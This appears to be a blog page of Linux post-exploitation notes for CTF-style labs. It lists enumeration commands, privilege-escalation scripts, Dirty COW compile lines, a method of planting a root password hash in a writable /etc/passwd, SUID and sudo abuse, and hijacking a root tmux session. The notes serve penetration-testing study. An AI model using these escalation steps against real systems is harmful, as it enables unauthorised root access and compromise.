Pages

Linux Post Exploitation

Steps to Follow after an initial Foothold is found on a linux OS.

Commands

uname -a
cat /etc/passwd
whoami
sudo -l

32bit or 64bit?
execute:
arch
file /sbin/init
uname -a ( x_64 = 64bit) (i386 or i686 = 32bit)

Look in the home directory of the user "ls -lAR", do you find "motd.legal-displayed​"
if so it maybe vulnerable to "Exploit-DB 14339"

Run Scripts

LinEnum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

Linuxprivchecker
http://www.securitysift.com/download/linuxprivchecker.py

Priv'esc check (Pentest Monkeys)
http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz

Kernel Exploits

What is the version of the Kernel (uname -a)

2.6.x -> 3.9 try DIRTY COW first (searchsploit 2.6 cow) (try first 40616.c)
compile locally(dont try to use -m32 on an 64 bit box for this exploit)
else
https://www.exploit-db.com/exploits/40839/
32bit -  gcc -pthread 40839.c -o 40839-32 -lcrypt -m32
64bit - gcc -pthread 40839.c -o 40839-64 -lcrypt

2.6.x --> then "searchsploit 2.6.x)


What files are word readable?
-------------------------------------------------------------------------------------------------
If /etc/passwd is..

Then add an encrypted version of a password then run it against the root user.

openssl passwd sp00ks
dhaczA9zC7C5k


so now we copy dhaczA9zC7C5k to the root users passwd line like so...

root:dhaczA9zC7C5k:0:0:root:/root:/bin/bash

and now we can do
# su
sp00ks

root@BOX:~# id
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------------------------------------------

Check SUID

SUID - at least one should work if not all of them.


find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

Example Vulnerable file

-rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency

We see the "s" is set for sticky and that it is executable by everyone!

So now run it "./var/htb/emergency"
and you should have root

#whoami
root
---------------------------------------------------------------
Running SUDO permission without a password

User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL

In this example as this is a user not a file, we can execute as user "scriptmanager"
without specifying a password.


www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash scriptmanager@bashed:/dev/shm$




---------------------------------------------------------------
searchsploit


What services are listening on localhost or 127.0.0.1?

---------------------------------------------------------------

Process List (ps -aux)



Tmux session running as root????

:~$ ps -aux | grep tmux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 1023 0.0 0.1 26416 1672 ? Ss Nov04 0:10 /usr/bin/tmux -S /.devs/dev_sess

 Connect to it - "tmux -S /.devs/dev_sess"

--------------------------------------------------------------

2 comments: